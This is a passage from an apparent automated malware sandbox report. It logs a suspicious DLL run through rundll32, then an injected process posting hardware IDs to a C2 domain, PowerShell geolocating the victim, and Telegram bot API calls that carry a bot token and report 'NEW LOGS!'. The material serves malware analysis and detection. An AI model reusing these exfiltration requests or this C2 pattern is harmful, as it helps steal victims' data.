                                                                                                                                                          2024-11-23 11:47:35 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                          2024-11-23 11:47:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          9192.168.2.449751104.21.88.2504438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:36 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=F0AWCPRRPW8BEIF
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 20426
                                                                                                                                                          Host: frogs-severz.sbs
                                                                                                                                                          2024-11-23 11:47:36 UTC15331OUTData Raw: 2d 2d 46 30 41 57 43 50 52 52 50 57 38 42 45 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 46 30 41 57 43 50 52 52 50 57 38 42 45 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 30 41 57 43 50 52 52 50 57 38 42 45 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a
                                                                                                                                                          Data Ascii: --F0AWCPRRPW8BEIFContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--F0AWCPRRPW8BEIFContent-Disposition: form-data; name="pid"3--F0AWCPRRPW8BEIFContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2
                                                                                                                                                          2024-11-23 11:47:36 UTC5095OUTData Raw: 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                          2024-11-23 11:47:37 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:37 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=h5qj7hkif7vr780uaggkgbgctf; expires=Wed, 19-Mar-2025 05:34:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tknzShuVyMA%2FrMzaW95UjEYkpPvqfIZ0a0Xp%2Bav3BCqRIKC1h4VpCvNhuz8wX5BoqNwZFYxXMClI587st4MB%2F2KKb6NThHXbirFa1lPfzyv7ocpYrmp0YBSeLvd5uCE2fiIB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70eceb8b3b4307-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1676&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21385&delivery_rate=1685912&cwnd=237&unsent_bytes=0&cid=46de5f5cadda6a1a&ts=896&x=0"
                                                                                                                                                          2024-11-23 11:47:37 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                          2024-11-23 11:47:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          10192.168.2.449752104.21.88.2504438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:39 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=86OMU50YVU
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 1270
                                                                                                                                                          Host: frogs-severz.sbs
                                                                                                                                                          2024-11-23 11:47:39 UTC1270OUTData Raw: 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43
                                                                                                                                                          Data Ascii: --86OMU50YVUContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--86OMU50YVUContent-Disposition: form-data; name="pid"1--86OMU50YVUContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--86OMU50YVUC
                                                                                                                                                          2024-11-23 11:47:40 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:40 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=vd7grrigpj88eb814to1pp7e4c; expires=Wed, 19-Mar-2025 05:34:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mLbNHQitaOEQIDYPL%2BRdreWAgYxQO%2BzosSCQ4455xBfcsLlB2m%2FAADno2YZ94ls0tlSW%2B%2Fb2KO3suH3DPo22jQsUhyE7Uj0j%2BZlO5dN8LVQDoi96UNe2pDqDMCJIqDC3AXL3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ecfd1c1a4340-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2179&delivery_rate=1150059&cwnd=199&unsent_bytes=0&cid=c78e44a8fb2e2735&ts=726&x=0"
                                                                                                                                                          2024-11-23 11:47:40 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                          2024-11-23 11:47:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          11192.168.2.449754104.21.88.2504438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:41 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=PB87JFRCI72DMDXKZ
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 1139
                                                                                                                                                          Host: frogs-severz.sbs
                                                                                                                                                          2024-11-23 11:47:41 UTC1139OUTData Raw: 2d 2d 50 42 38 37 4a 46 52 43 49 37 32 44 4d 44 58 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 50 42 38 37 4a 46 52 43 49 37 32 44 4d 44 58 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 42 38 37 4a 46 52 43 49 37 32 44 4d 44 58 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65
                                                                                                                                                          Data Ascii: --PB87JFRCI72DMDXKZContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--PB87JFRCI72DMDXKZContent-Disposition: form-data; name="pid"1--PB87JFRCI72DMDXKZContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e
                                                                                                                                                          2024-11-23 11:47:43 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:42 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=jtoktuq96lc6qnbhfgq9vnh9ur; expires=Wed, 19-Mar-2025 05:34:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2udjTl35BZPHpE%2F9MXwjbGHzH23qv1lx3X93x5F9koLXBiNXbJL%2FRwKztd%2BRfLuJctMaPESHB7Lu%2FvnokSYn32li3XBTHZl%2FeGHyPQgepPqbztrm6wniZ%2Ft6SPjZDl6t0Aef"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ed0c8a3343e8-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2563&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2055&delivery_rate=1004126&cwnd=214&unsent_bytes=0&cid=edfbdb8d19e16ddb&ts=1138&x=0"
                                                                                                                                                          2024-11-23 11:47:43 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                          2024-11-23 11:47:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          12192.168.2.44976234.117.59.814435436C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:55 UTC156OUTGET /ip HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: ipinfo.io
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:47:55 UTC305INHTTP/1.1 200 OK
                                                                                                                                                          date: Sat, 23 Nov 2024 11:47:55 GMT
                                                                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                                                                          Content-Length: 11
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-11-23 11:47:55 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                          Data Ascii: 8.46.123.75


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          13192.168.2.44976434.117.59.814437680C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:57 UTC156OUTGET /ip HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: ipinfo.io
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:47:58 UTC305INHTTP/1.1 200 OK
                                                                                                                                                          date: Sat, 23 Nov 2024 11:47:57 GMT
                                                                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                                                                          Content-Length: 11
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-11-23 11:47:58 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                          Data Ascii: 8.46.123.75


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          14192.168.2.44978034.117.59.814431880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:48:04 UTC161OUTGET /country HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: ipinfo.io
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:48:05 UTC448INHTTP/1.1 200 OK
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          Content-Length: 3
                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                          date: Sat, 23 Nov 2024 11:48:05 GMT
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-11-23 11:48:05 UTC3INData Raw: 55 53 0a
                                                                                                                                                          Data Ascii: US


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          15192.168.2.44978234.117.59.814437588C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:48:06 UTC161OUTGET /country HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: ipinfo.io
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:48:07 UTC448INHTTP/1.1 200 OK
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          Content-Length: 3
                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                          date: Sat, 23 Nov 2024 11:48:06 GMT
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-11-23 11:48:07 UTC3INData Raw: 55 53 0a
                                                                                                                                                          Data Ascii: US


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          16192.168.2.449808149.154.167.2204437748C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:48:18 UTC337OUTGET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:48:18 UTC388INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:48:18 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 336
                                                                                                                                                          Connection: close
                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                          2024-11-23 11:48:18 UTC336INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 38 35 36 36 33 32 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 33 36 31 35 39 37 36 39 34 2c 22 74 69 74 6c 65 22 3a 22 61 73 64 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 33 36 32 34 39 38 2c 22 74 65 78 74 22 3a 22 4e 45 57 20 4c 4f 47 53 21 5c 6e 42 75 69 6c 64 20 3d 3e 20 62 62 73 5c 6e 49 50 20 3d 3e 20
                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":386,"from":{"id":8085663235,"is_bot":true,"first_name":"LoaderStyk_bot","username":"LoaderStyk_bot"},"chat":{"id":-1002361597694,"title":"asd","type":"supergroup"},"date":1732362498,"text":"NEW LOGS!\nBuild => bbs\nIP =>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          17192.168.2.449814149.154.167.2204432256C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:48:19 UTC337OUTGET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-11-23 11:48:20 UTC388INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:48:20 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 336
                                                                                                                                                          Connection: close
                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                          2024-11-23 11:48:20 UTC336INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 38 35 36 36 33 32 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 33 36 31 35 39 37 36 39 34 2c 22 74 69 74 6c 65 22 3a 22 61 73 64 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 33 36 32 35 30 30 2c 22 74 65 78 74 22 3a 22 4e 45 57 20 4c 4f 47 53 21 5c 6e 42 75 69 6c 64 20 3d 3e 20 62 62 73 5c 6e 49 50 20 3d 3e 20
                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":387,"from":{"id":8085663235,"is_bot":true,"first_name":"LoaderStyk_bot","username":"LoaderStyk_bot"},"chat":{"id":-1002361597694,"title":"asd","type":"supergroup"},"date":1732362500,"text":"NEW LOGS!\nBuild => bbs\nIP =>


                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:06:47:00
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll"
                                                                                                                                                          Imagebase:0x920000
                                                                                                                                                          File size:126'464 bytes
                                                                                                                                                          MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:1
                                                                                                                                                          Start time:06:47:00
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:06:47:00
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:06:47:00
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled
                                                                                                                                                          Imagebase:0x930000
                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:06:47:00
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
                                                                                                                                                          Imagebase:0x930000
                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:06:47:00
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          Wow64 process (32bit):true
